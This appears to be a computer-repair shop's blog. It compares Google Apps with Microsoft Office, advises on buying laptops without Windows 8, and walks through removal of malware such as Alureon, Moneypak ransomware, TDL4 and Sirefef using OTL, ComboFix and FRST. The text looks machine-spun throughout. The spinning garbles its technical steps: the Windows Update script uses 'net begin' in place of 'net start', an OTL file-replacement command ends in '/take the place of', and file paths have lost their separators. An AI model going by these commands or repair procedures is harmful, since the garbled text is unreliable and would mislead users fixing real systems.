Google Challenges Microsoft Office Suite for a Share of the Enterprise Application Industry – Part 2

Should distributed version control be designed into a word processor Application? Why not just have a add on for git, mercurial, subversion, or whatever?

Google Apps for Business collaboration isn’t only DVCS – It’s real time. I’ve seen Google docs with double digit simultaneous users. That’s a bit more appealing than a git addon. Such a extension would call for regular commit, push, and pull of variations. Whether or not a git add on could attain this capability you continue to need another addon for shared document management. Google Apps for Business collaboration functions out-of-the-box together with the extra advantage of the ability to help to make a file shareable with the entire internet almost immediately.

Is it a good idea to move away from on premise Microsoft Exchange server designs to a more cloud-centric design similar to Google For Business?

We a short while ago worked with an organization who intended to employ Google Apps as a means to eradicate an on premise Microsoft Exchange server environment. The on premise MS Exchange Server maintained three basic defects: it did not communicate effectively with the community outside of the building, we lost all capability to connect by means of email during a protracted power outage despite the fact that we could nevertheless implement the Internet, and backing up the data stores was a colossal balancing act of supervising sensitive incremental and differential backup jobs along with the inconsistent granular restore “elements”.

To begin, all individuals had the option to use the MS Outlook or Google Gmail interface without mandating either or. At first, most people continue to utilized Microsoft Outlook client since they were acquainted with the interface. The operations personnel was first to move to the gmail web client as they all kept the purpose of increasing speed and effectiveness. Finance moved next because of similar reasons. Much later, sales and marketing departments moved to Gmail for a unique reason: they were making use of Google Docs to collaborate on assignments and needed to employ various Gmail – Google Docs integration capabilities. You’ll find still various hold overs for MS Outlook, nonetheless curiously as individuals retire, so does their utilization of MS Outlook as the new personnel might generally want to implement Gmail on account of familiarity.

Can you generate an argument that Google Apps offer comparable functionality to Microsoft Office or MS Office 365 programs?

It’s easy, Google Apps are certainly not as feature rich as the MS Office of Apps. Nobody who has used both MS Office/Microsofts Online Office 365 and the Google Drive web applications (Docs, Sheets, and Slides) would ever attempt to claim that Google’s products are “superior”. But the issue for Microsoft is whether Google Drive is “adequate, ” which it’s perhaps becoming. And it’s certainly a “simpler” solution in that having less features is of course less complicated.

But as web-based applications, Google Drive has usually suffered from an incredibly basic problem: They’re not created for offline utilization, so you must have an Internet connection to view, edit, or generate docs. But that’s changing. Last June, Google declared offline support for Google Drive, its word processor. And now Slides is additionally available for offline usage.

This functionality is significant for making Google Drive an acceptable solution for most end users, and it makes Google’s semi-preposterous Chromebook initiative practical. But such a device makes far more sense when there are truly useful applications accessible, especially when they may well be used offline.

In comparison to Google Drive, the Microsoft Office Wave supplies several advantages, but it’s fair to note that what Microsoft continues to disregard is the requirement for a free internet-centered productivity suite that may well be used offline. So while MS Office Internet applications continues to be a superior offering to Google Drive overall in this coming update, it nevertheless does not provide offline access.

Posted in Google Apps V. MS Office 365

A close encounter involving evaluation and extraction of the potent and tricky Fakesysdef Aka Alureon rootkit.

A client a short while ago brought a laptop into shop suffering with what was described as:

“I’m receiving the bogus screens of HDD S. M. A. R. T. on my laptop notifying me to pay for a full license in an effort to do away with the infection on my hard disk. I also receive an Avast! messages that a process called MAL interfered with process explorer. exe on my Windows XP system. I performed a scan with Avast, which indicated an infested file and a boot scan observed the Alureon-K virus. After the reboot, everything was gone! empty desktop, empty Software and empty data directories. The files are still there, though, due to the fact I ran several more scans which scanned all the docs. ”

A short while ago I’ve witnessed variations of the fixsysdef, aka Rogue. fakeHDD, wipe the notebook bare like this. This malware will store docs and shortcuts in temporary folders so prior to anything at all else I scan the system with RogueKiller. RogueKiller effectively located and updated multiple registry records which contributed to the bare desktop and missing programs folder. More particularly RogueKiller updated the registry entries: HKCU[...]Advanced: Start_Show* from a value of 0 to 1.

Next I employ the valuable program OTL. I perform an Old Timers’ OTL scan on all users and the resulting log suggests a few corrupt browser helper objects along with a suspect startup object: C: Documents and Settings%User%Local SettingsApplication DataGoogleChromeApplicationchrome. exe. Old Timers’ OTL additionally shows the location of the fakeHDD scanner: C: Documents and Settings%User%Application DataMicrosoftInternet ExplorerQuick LaunchSMART_HDD. lnk. I quickly produce an OTL recovery script and apply the fix.

The OTL log additionally indicates an illegitimate mount point. I execute a scan and cure with TDSS Killer and this effectively solves the issue. After this the notebook functions much smoother and Avast! no longer triggers an alarm.

An excess concern arises together with the Printers and Faxes directory which is entirely empty. Attempting to add a printer produces the error: ‘Operation could not be completed. The print spooler service isn’t running’. Restarting the service manually is not successful. I attempt to fix the spooler service along with the clean spooler tool to no avail. The print spooler service document has become compromised and needs to be replaced. I utilize Old Timers’ OTL to locate the original system file:


and the following command to restore the original file:

: Docs
C: WINDOWSsystem32spoolsv. exe|C: WINDOWSsystem32dllcachespoolsv. exe /take the place of

The spooler service is now backup and running. The computer can now access and print to all connected devices.

After confirming the operation of the pc I notice that flash player isn’t really working or updating in the Firefox web browser. To proceed with this fix I first download the Adobe Flash uninstaller from the adobe site. Once the Adobe flash player has been successfully removed I download the updated player, from the adobe website, for both Internet Explorer and Firefox.

I attempt to verify the proper operation of the notebook again, and this time via my checklist I notice the Windows Update service won’t begin – this pc is not receiving any windows updates. For this fix I make use of the Farbar service scanner. Here is a little background on the service scanner:

Farbar Service Scanner, is a small portable tool that enables you to detect internet connectivity defects owing to corrupted or missing Windows services. Certain malware, such as TDSS, may delete or corrupt Windows services, which would cause your computer to no longer have LAN connectivity. When FSS is run it can display a detailed report on the services, driver services, their configurations and the files that are accountable for network connectivity.

Farbar Service Scanner suggests windows security service has not started. I speedily produce a dos script to force clean up a few directories and force reboot these services:

net stop bits > junk. txt
net stop wuauserv >> junk. txt
regsvr32 /u wuaueng. dll /s >> junk. txt
del /f /s /q %windir%SoftwareDistribution*. * >> junk. txt
del /f /s /q %windir%windowsupdate. log >> junk. txt
regsvr32 wuaueng. dll /s >> junk. txt
net begin bits >> junk. txt
net start DcomLaunch >> junk. txt
net begin RpcEptMapper >> junk. txt
net begin wuauserv >> junk. txt
wuauclt. exe /resetauthorization /detectnow >> junk. txt
net start >> junk. txt
NetSH WinHTTP reset proxy >> junk. txt

After executing the script the Windows update service still will not begin. I like to employ my trusty Windows fixit tool, Windows Repair (All In One), when faced with a computer as compromised as this. Windows Repair All In One effectively automates the process of running a check disk and system file checker – it additionally repairs things such as file permissions and windows updates service.

After accomplishing the scan and fix with Windows Repair (All In One) everything operates wonderfuly, Windows update functions properly and the pc is smooth and silent.

Posted in Virus, Malware And Spyware Removal

A closer look at the analysis and decontamination of the virulent and destructive FBI / DOJ Moneypak ransom trojan.

We not too long ago encountered a version of the prevalent urausy.fbi.moneypack ransomware from a client who described the computer as: “My dad’s laptop obtained the Department of Justice moneypak virus. It states to be from the department of justice nonetheless everything it says tells me it’s the fbi moneypak virus i got a couple of weeks ago, just under a different name. He uses a MS Windows XP pc. I would usually try to remedy it myself the way in which I fixed my laptop earlier, but i cannot get into safe mode or safe mode with networking. Whenever I try the computer automatically reboots itself. I attempted googling help to fix this concern however now instead of restarting itself it goes into a blue screen of death”.

Ok, eradicating this bad boy is going to be enjoyable! Here is a quick summary of the virus: FBI Moneypak malware is computer virus that displays a fraudulent FBI warning as part of its attempt to divert cash from the victim via MoneyPak. Although the FBI Moneypak computer virus’s pop-up alert proclaims that your PC has been locked in connection with intellectual property-based offenses (such as downloading illegal mp3s), we point out the point that the FBI Moneypak ransomware is totally disassociated from the FBI and all supplementary legal enforcement organization. FBI Moneypak virus will attempt to prevent all major Apps even while FBI Moneypak virus is open, nonetheless an alternate boot method merged with an accurate anti-malware scan will eradicate FBI Moneypak virus, and with it, the blockade that FBI Moneypak ransomware causes. Although FBI Moneypak ransomware informs it is victims that this can end the blockade, We discourage handing money over to the FBI Moneypak malware’s lawbreaker buddies, since this isn’t guaranteed to save your PC and is not necessary for getting rid of FBI Moneypak computer virus safely.

This transformed version of urausy.fbi.moneypack virus won’t allow us to into the OS by way of safe mode so we approach the resolution by way of a different means. I begin with a bootable windows installation dvd and a USB drive containing Farbar recovery scan tool. Booting from the Windows installation cd and carrying out FRST from the USB drive enables me to sidestep the screen lock initiated by the virus. I next implement FRST and review the log saved to the USB drive. The FRST log supplies a top notch overview of the current state of the pc. The FRST log reveals numerous invalid startup records along with a compromised winlogon shell value. Additionally, compromised virus documents had been saved in the Users%user%AppDataRoaming and C: Users%user%Application Data folders. In this case the docs of interest included skype. dat, skype. ini and a lot of addtional %random%. dll’s.

I develop a FRST script and apply the fix via the USB drive. Upon completion of the fix the notebook is now capable of booting into Windows typically. Next, I execute a quick scan and cleaning with AdwCleaner and RogueKiller. The AdwCleaner log indicates a single corrupt registry entry and the RogueKiller log indicates 5 compromised registry entries including modifications to DisableTaskMgr, DisableRegistryTools, and NewStartPanel values.

The virus executed numerous major harm to the os so for the next step I implement combofix, a potent recovery tool. The combofix log indicates several more deletions of files located in the c: programdata folder. Furthermore, I produce a quick combofix script to clear the java cache on the infected computer.

Aside from a slow IE internet browser, the computer functions much smoother now. In order to repair IE I open up internet options and under the advanced tab choose to reset IE. After the reset IE operates much smoother.

This computer operates practically perfect now. I execute one last scan with malwarebytes. The MBAM logs come back negative indicating a clean laptop.

Posted in Virus, Malware And Spyware Removal

Buying a Notebook That Won’t Include MS Windows 8.

We had been fairly recently posed this query, and its an excellent one, from one of our very good clients:

“I am just starting to look for a pc for school, and the only thing I manage to find are laptops or netbooks which have MS Windows 8. I have utilized MS Win 7 for an extended time now, and would not have difficulty giving it up, however not for MS Win 8. After visiting some main online retail sites, I have observed that finding either a MS Win 7 notebook, or even a pc without an operating system is practically impossible. So where must I go if looking for laptops sans os, or at the very least sans MS Windows 8? ”

Win 8: Missing a Start Menu

You have numerous options accessible. First I’ll address the biggest complaint we receive about Win 8: the lack of a start button. If you’re anything like me you keep your desktop clean, and nearly exclusively use the start button to access Apps. I do not like clutter, and only use my desktop for a couple of widgets and short term file storage. The start button is vastly better for running multiple tasks than a desktop: the desktop is already concealed by the programs that are already open, and I tend not to want to have to go back to it just to open a new program.

This isn’t the end of the world. What with doing Windows support as a proffession I use the new and old Windows versions all the time. I run MS Windows 8 at work, Win 7 at home. MS Win 8 is fine, once you get a windows start menu back.

If you really require a windows start menu multiple alternatives exist for for instance a windows start menu to Microsoft Win 8. Start 8 is my favorite, costs $5. Start is Back costs $3 and essentially restores the Windows start menu, the code is still in Microsoft Win 8, at least most of it. Classic Shell is needless to say free and functions fine, I just tend not to care for it as much.

Downgrading MS Win 8 to MS Win 7

Numerous consider purchasing a MS Windows 8 machine and re-installing Microsoft Win 7 onto it a feasible option. But, a wipe and reinstall of Microsoft Windows 7 isn’t really inexpensive. Microsoft Win 7 isn’t really given away, and if you tend not to have an old non-OEM edition hanging around it can cost you. Actually the reason so a number of individuals have Windows is simply because it comes free or close to free with pcs. If individuals ever had to pay complete non-OEM prices then it would die quickly. generally sticking to whichever OS the notebook came with will give you the least amount of trouble.

Currently the hardware supports Microsoft Windows 7 just fine, but releasing customized versions (the customizations are necessary for things like battery life optimization) of MS Win 7 drivers is costly and time-consuming. A lot of suppliers just won’t bother unless they’re still selling the same equipment with Microsoft Windows 7 anyway, or supply an official downgrade option (like Dell or Lenovo on their enterprise designs).

If you just download a generic driver from Intel, nVidia, ATi or the like you typically won’t get everything your equipment has to deliver – be it things like OSDs for display of volume/brightness or battery life. For instance, Installing straight from the manufacturer, all original Intel drivers, on a Thinkpad instead of the Lenovo custom-made drivers may well reduce your battery life by about 40% – its a huge distinction.

Distributors of MS Win 7 Machines

Dell supplies enterprise machines with Microsoft Windows 7. I recommend the XPS 13. You can Go to their Enterprise website, pick laptops, and check the box for Microsoft Windows 7.

I additionally recommend Lenovo Thinkpads. I not too long ago put together a W530 with a 1920×1080 screen, one of the few you will discover outside Apple. It has excellent Linux support, even down to the crazy fingerprint scanner. I will easily get 7 hours or so on the battery along with the recommended alterations. There’s a whole wiki just for Thinkpad stuff. It ships with Win 7, but you never have to boot into Windows. You can blow away the complete drive, “recovery” and “boot” partitions, and never look back. It has a standard BIOS let alone UEFI (disabled by default; leave it that way), so you should never have any issues there.
It’s a tank, it’s not very sexy like an ultrabook, however its great if you want a desktop-fast Linux-friendly workstation notebook.

Linux Alternatives

system 76 sells/ships pcs, desktops, and servers with Ubuntu. If you’re a linux user or feel as if you are able to be ready to take the plunge, this is a fantastic place to start. At least their systems are entirely linux compatible. Even if you really don’t like ubuntu and have some other pet distribution, it has a better possibility of working on one of these than if you get a windows pc and flush the hard drive to install linux.

Windows 8 – Is It Really That Bad?

Honestly not much has changed. Actually, the largest change in Win 8, is that I have to press the windows key when I logon as a way to reach the desktop. I still just hit win+r for the “Run” prompt, or click a shortcut in the variety of places I’ve aggregated them that make far more sense than a Microsoft Windows 7 or MS Windows 8 start button layout.

I will say I don’t hate MS Windows 8. Quite a few things I like about Microsoft Windows 8 are this: low memory and disk footprint, easier access to commonly utilized functions (mouse to the far bottom left, right click; works with start8 too). Effective copy dialog that even shows instant rather than average transfer rates (pretty nice feature to have, yet shockingly MS Win 8 is the only OS that does it). Enhanced explorer features like e. g. “admin console here”, and built in support for mounting iso’s. With MS Win 7 you have to add these in on your own, with microsoft windows 8 they are already there.

I am in whole agreement that there is no reason to upgrade from Windows 7 to MS Win 8. However if you get Windows 8, it’s not the end of the world. Its quick and secure, and it has some improvements I like, the new task manager is quite nice. But it is not difficult. It runs every program I have tried on it that additionally ran on 7 (and I’ve tried a lot) and it isn’t difficult to use.

For that matter even the new start menu is perfectly usable, it’s just more clunky than what it replaced. It isn’t hard to use, just slower and inelegant. Perfectly usable though, we leave it on the 2012 servers we have.

Deals on Win 7 Devices

If you happen to be set on a win 7 machine and have a little bit of time to hunt for bargains my best suggestion is to get an account at fatwallet. co. (a coupon and deal aggregator website), and set up a “topic alert” where you get emails sent to you whenever a good deal with a specific keyword (I used “i5″ in addition to “14. 1″ as keywords for my last notebook). Also frequently visit slickdeals as they have a nicer layout and faster response time for sales of limited quantity. It is almost always these deal aggregator sites that select up the best limited quantity sales of clearances (which may well almost always be Win7 nowadays).

Posted in Is Windows 8 Really That Bad?

Google Challenges Microsoft Office Suite for a Share of the Enterprise Application Industry – Part 1

Over a number of years Google Apps for Business incrementally (and in some cases not so slowly) bit into MS’ monopoly on business application distribution. Affordable pricing programs and simple integration sparked Googles’ validation inside the enterprise application sector. Google Apps costs $50 per year per person utilizing its Google Apps for business products. Google Apps for Business also delivers a selection of integration resources which effectively migrate Microsoft Office products to Google cloud centered systems.

We discussed with Corey O’neill of Liquid Team, a top web development & technologies solutions firm specializing in Internet, Extranet, Intranet, eCommerce & mobile solutions, to understand what she thinks of the enhanced Google offerings.

We’ve read issues that the Google spreadsheet and word processor programs really don’t wholly satisfy professional workflow demands. Do you suppose Google Apps product offerings will be able to replace MS and/or Word?

It’s accurate. The Google Apps Spreadsheet software lacks capabilities, such as pivot tables, critical to some business professionals. I’ve noticed a lot of businesses use Google Apps for Business exclusively to share Microsoft Office documents. It’s simply a matter of time before Google Apps Spreadsheets catch up with Excel and wipe out the requirement to create documents in one environment and share them in another – in due course enterprise will remove the added action from their workflow. Enterprises nevertheless count on Microsoft Server/Windows RDS CALS, MS Office Volume CAL’s, Citrix CAL’s and Active Directory CAL’s so that staff are able to keep productive while removed from the workplace. The rates of licenses will start to accumulate and I presume that’s why we’ve seen the emergence of MS Office 365 – to contend with Google at the mobile enterprise level.

Does MS deliver similar effortless collaboration that Google Apps delivers?

Microsoft faces problems with an increasing number of business transmission never proceeding through paper, the majority of the essential MS Office elements are actually not very vital in comparison to effortless collaboration, in fact their presence just help to make the products much more complicated.

I imagine most contemporary enterprise consumers opt for MS on account of SharePoint. In my opinion Google Apps for Business collaboration features surpass Sharepoint.

We’ve witnessed many case studies in which Microsoft Sharepoint has not been implemented correctly. I’ve seen full document versions vanish, for example. In many cases, end users have difficulty adhering to the check-in and check-out protocols. So end users end up creating their personal methodologies in order to get things to work for them, for instance keeping multiple copies of a single document and supplying each new version with a different name than the previous one – this genuinely defeats the objective of MS Sharepoint..

On the other hand, collaboration within Google Apps for Business works right out of the box.

If you happen to be considering including Google into your business workflow you may learn more about our Google Apps for Business integration services.

Posted in Google Apps V. MS Office 365

A close encounter involving examination and excision of the JS: Iframe-FG JavaScript virus.

A business associate stopped by the pc shop not long ago. He expressed serious concerns about a probable malicious take over of his online business ınternet site. Moreover, He required some assistance examining new malware alerts originating from his anti-malware software Avast!. The application cautioned of corruption by the JS: Iframe-FG [Trj] malware. He continued on to explain that none of his internet browsers would open his company website. Furthermore, the anti-virus packages, installed on his clients computers, showed an infection situated within the website.

My first action includes reviewing the website with a number of third-party analysis resources, which include Zulu Url Risk Analyzer and URLVoid. The Zulu review verifies that many anti-virus applications consider his website harmful – this isn’t good for business. The URLvoid log comes back positive – confirming the presence of the JS: Iframe-FG trojan hack.

A brief history: the Trojan: JS: Iframe is a vicious JavaScript that is embedded as an IFrame in hacked internet sites, commonly by way of SQL injection approaches, or as a result of Blackhat search engine optimization poisoning. When opened in a internet browser, the virus redirects the browser to an alternative internet site.

The subsequent step calls for acquiring the origin of the malware. In many instances, the purpose, of an iframe injection hack, includes redirecting the web browser from one web site to an alternative internet site. I execute a further scan of the website – this time using urlquery. net. The report suggests a browser reroute to the domain couchtarts(dot)com. I can deduce, founded on the virus description and redirect location, the fingerprint of the unwanted javascript code. I look throughout the files on the web server for all occurrences of “var _q” and eliminate all accompanying javascript.

We adjust the account details of the web server and the content manager and the site now functions seamlessly.

Posted in Virus, Malware And Spyware Removal

Pages from the lab book of a pc tech: analysis and eradication of the destructive Trojan. Win32. Weelsof virus.

A new associate came by the office yesterday, carrying her suffering computer along with her. She described regular warnings from her anti-virus software program, Avast!, showing possible corruption within the C: ProgramData directory. She added that the alerts pointed out dodgy processes attempting to utilize system resources to communicate with an external internet site: urbangood. info.

I’ll have a quick moment here to bring up the anti-virus software program Avast!. I recommend Avast! to each one of my customers and family. I incorporate it in a collection of essential tools I implement on a day to day basis when repairing computers. It’s simple to find why Avast! retains very high ratings on the Cnet software download website. Not only does the personnel regularly update the software package with the most current virus definitions but the user help support is nearly unrivaled.

Alright, proceeding with the fix. To begin with, I update and carry out a quick scan with the anti-virus software program, Ikarus, currently installed on the system. Verified, The Ikarus analysis suggests existence of the Trojan. Win32. Weelsof trojan.

A quick word concerning Trojan. Win32. Weelsof, the formal identity of a vicious trojan linked with notorious ransomware, such as the UKASH virus, acknowledged for intimidating computer users into spending cash to have control of their computers relinquished. The functionality of the malware include spying on the infected pc, sending confidential information, and installing or executing other viruses from a remote server.

Indications of contamination involve computer system operations slowing down to a halt in addition to the occurrence of dodgy files and processes located specifically in the C: ProgramData directory. Numerous computer users acquire the malware through:

1. Drive-by scripts located on corrupted shareware and freeware sites and downloaded to the computer with no knowledge or consent.
2. Clicking suspicious pop-ups or hyperlinks.
3. Launching email attachments from unidentified origins.

I proceed to download, to the afflicted computer, my array of handy pc repair tools which include: Avast!, OTL, ComboFix, MalwareBytes and TDSSKiller. The first action, toward eliminating this virus, includes performing an OTL diagnostic. The OTL analysis reveals unwanted files located in the C: ProgramData and C: Users[users]AppDataRoaming directories, Alternate Data Streams in the C: ProgramData and C: Users[user]AppDataLocal directories and needless Web browser toolbars. taking into account the latest malware defintions, I’m relatively positive the dodgy files and Alternate Data Streams in the C: Users[users]AppDataRoaming and C: Users[user]AppDataLocal are not created by the Trojan. Win32. Weelsof virus – they need elimination nevertheless.

I produce an OTL script and run the fix. The OTL log suggests a clear system.

I restart the pc and it starts to operate faultlessly.

Posted in Virus, Malware And Spyware Removal

On The job experience with and eradication of the effective TDL4 malware.

Recently a person brought in a laptop troubled with, as he referred to, “the ever present blue-screen-of death”. He continued to clarify the computer system, at first, would on occasion display an error screen primarily after at least an hour of computer usage, however recently the pc showed a stop error at the time of each log in. He tried using various anti-malware analyses, in safe mode, with the software MalwareBytes and Avast. After the scans and a reboot the computer system booted immediately to a black screen with not a thing but a mouse cursor displayed on the monitor. He needed help.

This computer would not boot accurately so, in order to analyze and fix boot issues, we employ a tool developed to run in the Windows Recovery Environment. In such cases, We perform a diagnostic scan using Farbar Recovery Scan Tool via an open USB drive. The FRST analysis exposes contamination from the TDL4 rootkit.

TDL is a robust rootkit and botnet. TDL employs a variety of techniques to evade all types of discovery, and uses encryption to be able to aid transmission amongst its bots and the botnet command center. TDL also consists of a potent rootkit factor, that permits it to hide the existence of any various other types of adware in the computer system. Left unchecked, TDL might trigger complete system failure.

After that, I develop a simple FRST fixlist script and run this file through the flash drive. The FRST log reveals successful completion of the operation.

The laptop continues to be not able of booting into normal mode so we move forward with a comboFix check inside safe mode. The comboFix log shows numerous things. First, the infected computer system has lingering registry items of uninstalled Anti-virus and Spyware software program. In such a case, it turned out McAfee sticking around – this provides an undesirable scenario because these kinds of remnants may conflict with recovery programs, such as comboFix which was now displaying an error, and future anti-virus software packages. It’s significant to be aware, just one single anti-virus program really should be installed on the pc at any time. Next, the comboFix log reveals successful removal of malware which stayed undetectable by TDL4. In this case, the applications are located in the following directories: c: users[user]AppDataLocal, c: usersElliotAppDataRoaming, and c: windows. ComboFix sufficiently cleans these spyware and adware. I create a small comboFix script that erases the lingering McAfee registry records.

The pc continues to be unable to start up into normal mode consequently we move forward with an analysis utilizing TDSSkiller. The TDSSkiller report implies successful discovery and eradication of a suspicious hard drive partition.

After completion of the TDSSkiller repair, the pc currently boots into Normal mode free of issues.

These kinds of rootkits increase their grip deeply into the operating-system so we continue on a more comprehensive investigation of the laptop with OTL. The OTL report reveals a number of hidden system files in the C: UsersElliotAppDataLocal and C: ProgramData directories. Hidden system files shouldn’t be found here – so we create an OTL script to remove these unnecessary executables. The resulting OTL report reveals a clear laptop!

This computer now boots up and operates splendidly.

Posted in Virus, Malware And Spyware Removal

On The job evaluation and decontamination of the extensive win32: malware-gen malware.

An interesting afternoon without a doubt. a couple of customers got in touch with us today, both of whom with computers evidently corrupted with the recently commonplace win32: malware-gen trojan.

Both customers detailed regular notifications from their anti-malware, Kaspersky and Avast, and of sloth-like, bordering on unusable, computers. The win32: malware-gen virus represents a dangerous attack on the system. In addition to causing sluggish operation, the malware may be used to redirect web searches and to upload backdoors and keyloggers. If left unmitigated, the virus may very well start a full os breakdown.

As usual, I start by uploading the essential diagnostic tools including: Avast, autoruns, ComboFix, OTL, and MalwareBytes. It’s valuable to note that I regularly obtain the most recent versions of these applications ahead of starting up any maintenance.

The first phase involves beginning an OTL analysis. I expect to see that there is a file in the c: windowsinstaller directory. Sure enough, in both scenarios, the OTL log shows corrupted files throughout the c: \windowsinstaller and c: Windowsassembly directories. Moreover, one system contained an corrupted file in the C: Users[USER]AppDataLocal directory. I develop a restoration script and execute an OTL fix for these issues.

Next, I begin a ComboFix scan which analyzes and recovers the services. exe system file. At this time everything seems to be desirable. I carry out one additional analysis of the computer system, with Avast, in order to guarantee no additional malware are left behind. Both computers now run close to perfect. I carry out several “spring cleaning” procedures like adding MalWareBytes and FileHippo update checker. I perform numerous windows updates to one device.

Posted in Virus, Malware And Spyware Removal

In-The-Field evaluation and removal of the “Sirefef” Trojan.

A new customer got in contact with me, recently, to explain various alerts her anti-malware produced over the last 24 hours – in this instance her anti-virus application was AVG.

She identified alerts such as virus descriptions: win64: sirefef-A win64: sirefef-AO win32: malware. gen. I quickly recognized these warnings as existence of the Sirefef virus. Sirefef is a nasty virus that will install rootkits, modify your registry settings, and adjust other important windows system files such as services. exe. If left unattended Sirefef can cause a full system crash. Some adaptations will probably include backdoors and keyloggers which can be used to gain access to confidential data like passwords, credit card, and bank account info.

Indicators of the Sirefef Trojan include things like: rerouted web searches, altered web browser homepage, changed desktop background image, slower operation from the pc, and uninitiated pop-up windows.

I start out by downloading the typical analysis and repair programs to the infected computer system through peripheral drive – programs consited of Avast, autoruns, ComboFix, OTL, and MalwareBytes. It’s important to be aware that I rename combofix. exe before uploading the program to the infected pc.

My 1st action consists of performing a system check with OTL. Here, the OTL log revealed undesired adjustments to the Internet Explorer registry values, undesired browser helper objects, and needless active x components. I proceed by scripting and applying an OTL fix.

Next, I continue to disable all anti-virus and anti-malware applications that were running and commence an test and repair using ComboFix. Keep in mind, Combofix can act undesireably during a diagnostic hence it’s preferred to leave it alone until completion. Combofix discovered several files for removal throughout the following directories: c: data, c: documents and settings, c: windowsDownloaded Program Files, c: windowsInstaller.

I conduct one additional scan of the computer with Avast which located no additional threats on the pc. I finish a few additional modifications including: updating Java, installing Malware Bytes and FileHippo update checker, and verifying that Windows in up-to-date.

Posted in Virus, Malware And Spyware Removal
Call Us!
Call us for a free analysis.
(818) 674-0941
Poke us